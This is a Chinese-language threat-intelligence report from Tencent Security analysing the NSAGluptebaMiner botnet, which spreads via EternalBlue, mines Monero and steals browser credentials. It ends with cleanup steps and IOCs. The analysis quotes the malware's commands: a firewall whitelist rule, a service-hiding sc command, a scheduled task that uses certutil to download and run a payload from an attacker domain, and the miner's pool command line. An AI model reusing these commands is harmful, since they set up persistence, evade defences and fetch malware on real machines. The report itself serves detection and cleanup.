产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
挖矿僵尸网络NSAGluptebaMiner利用永恒之蓝漏洞传播
2020-04-17 15:16:35
一、背景
腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。
cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。
当前NSAGluptebaMiner版本具有以下特征:
1. 利用永恒之蓝漏洞攻击传播;
2. 安装计划任务持久化,任务利用certutil.exe下载木马;
3. 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传;
4. 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单;
5. 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护;
6. 运行门罗币挖矿程序wup.exe;
7. 利用组件cloudnet.exe构建僵尸网络;
8. 连接远程服务器,接收指令完成远控操作;
9. 通过比特币交易数据更新C2地址。
NSAGlupetaMiner僵尸网络攻击流程图
二、详细分析
漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp)
首先会检测是否在虚拟机中执行。
然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。
在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序:
Winmon.sys用于隐藏对应PID进程;
WinmonFS.sys隐藏指定文件或目录;
WinmonProcessMonitor.sys查找指定进程,并关闭。
维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。
下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。
下载矿机和挖矿代理配置信息。
获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。
在handleCommand函数中实现后门功能,包括下载文件、程序执行等。
各函数及对应操作如下:
函数 |
操作 |
GetAppName |
获取App名 |
IsAdmin |
是否Admin账号 |
ProcessIsRunning |
进程是否运行 |
Update |
更新 |
Exec |
执行程序 |
Download |
下载 |
DownloadAndRun |
下载并执行 |
DownloadAndRunExtended |
下载并执行扩展 |
Exit |
退出 |
UpdateData |
更新数据 |
UpdateCloudnet |
更新cloudnet.exe |
StopWUP |
停止挖矿程序wup.exe |
UpdateService |
更新服务 |
GetLogfileProxy |
读取日志文件\proxy\t |
GetLogfileI2Pd |
读取日志文件\i2pd\i2pd.log |
Notify |
开启心跳包,在指定的时间间隔进行上报 |
NotifyHost |
上报主机 |
EventExists |
判断event是否存在 |
MutexExists |
判断Mutuex是否存在 |
RegistryGetStartup |
注册自启动项 |
VerifySignature |
验证文件签名 |
RegistryGetStartupSignatures |
验证启动项文件签名 |
VerifyProcessesSignatures |
验证进程文件签名 |
GetUnverifiedFiles |
上报未签名的文件 |
GetStatsWUP |
获取挖矿木马统计信息 |
UploadFile |
上传文件 |
Install |
下载并安装 |
SC |
截屏 |
UpdateCDN |
更新C2 |
DiscoverElectrum |
使用硬编码的以太币钱包,读取区块链交易数据 |
DiscoverBlockchaincom |
从区块链交易数据中获取加密的新的C2地址 |
设置防火墙规则,将csrss.exe添加到白名单:
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单:
cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行:
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
灵活更新C2:通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。
组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。
运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。
组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。
组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x --nicehash -k --api-port=3433 --api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b --http-port=3433 --http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b --donate-level=1 --randomx-wrmsr=-1 –background
Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件
C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。
三、安全建议
企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。
也可参考以下步骤手动完成清理:
检查以下各项,如有进行清除:
目录和文件:
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\
C:\users\administrator\appdata\loCal\temp\Csrss\
C:\Windows\rss\Csrss.exe
C:\Windows\windefender.exe
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonProCessMonitor.sys
C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe
C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe
注册表:
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random>
HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet
HKEY_CURRENT_USER\Software\MiCrosoft\<random>
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor
HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost
计划任务:
ScheduledUpdate
推荐企业用户部署腾讯安全完整解决方案提升系统安全性。
腾讯安全解决方案部署示意图(图片可放大)
企业用户可根据业务节点拦截位置部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,可参考下表选择:
拦截 位置 |
安全产品 |
解决方案 |
云上 业务
|
腾讯云T-Sec 安全运营中心(云SOC)
免费试用云SOC产品 |
云上业务的事前安全预防、事中监测与威胁检测及事后响应处置。 事前环节:云上资产的自动化动态盘点。识别云上配置风险,云上高危端口及组件的自动化检查。 事中环节:云上安全产品告警统一监测,流量威胁感知,识别云上攻击和失陷主机行为。 事后环节:对特定安全事件实现自动化响应,云上安全日志审计与调查溯源。 云上安全态势及安全成果的可视化展示。 |
云防火墙 (Cloud Firewall,CFW) |
一款基于公有云环境下的 SaaS 化防火墙,主要为用户提供互联网边界的防护,解决云上访问控制的统一管理与日志审计的安全与管理需求。 |
|
未 采 用 云 上 业 务 |
腾讯T-Sec 安全运营中心(专有云)
扫码了解更多信息 |
以安全检测、事件关联及智能分析为核心功能,并以腾讯威胁情报、3D可视化为特色。通过海量数据多维度分析、对威胁及时预警并做出智能处置。
适用于多种安全运营管理场景,帮助企业打造全网安全态势可知、可见、可控的闭环。 |
威 胁 情 报
|
腾讯T-Sec 威胁情报云查服务 (SaaS) |
SaaS形式自动化威胁情报查询产品: 满足对IP/Domain/文件等对象的威胁查询、SaaS形式威胁情报查询及溯源产品“T-Sec高级威胁追溯系统”。 |
腾讯T-Sec 威胁情报平台(TIP) |
将腾讯安全最新的威胁情报能力变成一套可本地部署的威胁情报管理平台,帮助企业在内网/专网/私有云等环境实现威胁情报管理和查询。 根据威胁情报提供的IOCs信息,将失陷数据同步到网络中的各个设备,对危险访问、入侵流量、恶意文件进行检测、识别和拦截。 腾讯TIP平台的IOCs信息可自动同步,也支持管理员手动添加。 |
|
腾讯T-Sec 高级威胁追溯系统 |
进行线索研判、攻击定性和关联分析,追溯威胁源头,有效预测威胁的发生并及时预警。 |
|
网络 资产 风险 检测 |
腾讯T-Sec 网络资产风险检测系统(腾讯御知)
免费试用腾讯御知 |
全面检测企业网络资产是否受安全漏洞影响。 可全方位监控企业网站、云主机、小程序等资产存在的风险,包含弱口令检测、Web 漏洞扫描、违规敏感内容检测、网站篡改检测、挂马挖矿检测等多类资产风险。 |
入侵 流量 检测 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。 |
主机 终端 保护 |
腾讯T-Sec终端安全管理系统(御点) |
拦截病毒木马攻击终端系统; 支持集中检测、修复各终端系统存在的安全漏洞; 支持启用文档守护者功能自动备份重要资料文件。 https://s.tencent.com/product/yd/index.html
个人用户推荐使用腾讯电脑管家保护终端系统。 |
安全 服务 |
腾讯安全定期巡检服务 |
由腾讯安全团队专业工程师提供定期巡检服务,对客户采购的全系列腾讯安全解决方案的运行维护情况提供详细专业的技术报告。 |
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
IOCs
Domain
biggames.club
biggames.online
deepsound.live
sndvoices.com
2makestorage.com
infocarnames.ru
URL
http[:]//biggames.club/app/app.exe
https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe
md5
b1c081429c23e3ef0268fd33e2fe79f9
da75bc9d4d74a7ae4883bfa66aa8e99b
00201e5ad4e27ff63ea32fb9a9bb2c2e
6918fd63f9ec3126b25ce7f059b7726a
fcf8643ff7ffe5e236aa957d108958c9
9b47b9f19455bf56138ddb81c93b6c0c
0dbecc91932301ccc685b9272c717d61
矿池:premiumprice.shop:50001
参考链接:
https://www.freebuf.com/articles/system/172929.html
https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/
在线咨询
方案定制